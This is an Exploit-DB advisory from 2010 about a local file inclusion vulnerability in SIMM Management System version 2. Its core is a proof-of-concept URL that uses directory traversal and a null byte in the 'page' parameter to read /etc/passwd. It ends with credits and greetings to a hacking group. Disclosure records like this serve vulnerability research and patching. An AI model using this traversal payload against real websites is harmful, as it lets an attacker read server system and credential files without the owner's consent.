SIMM Management System (SMS) - Local File Inclusion

EDB-ID:

12848




Platform:

PHP

Date:

2010-06-02


===================================================================================================


  [o] SIMM Management System (SMS) Local File Inclusion Vulnerability

       Software : SIMM Management System (SMS) version 2
       Vendor   : http://anodyne-productions.com/index.php/sms/index
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/


===================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?page=[LFI]


  [o] PoC

       http://localhost/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00


===================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe wishnusakti inc0mp13te pizzyroot
       kaka11 matthews xrootboy martfella Genex H312Y }^-^{ k1tk4t str0ke
       ArRay bjork xmazinha veter f1 akatsuchi N4ck0
       all people in #evilc0de [at] irc.byroe.net


===================================================================================================


  [o] June 02 2010 - GMT +07:00 Jakarta, Indonesia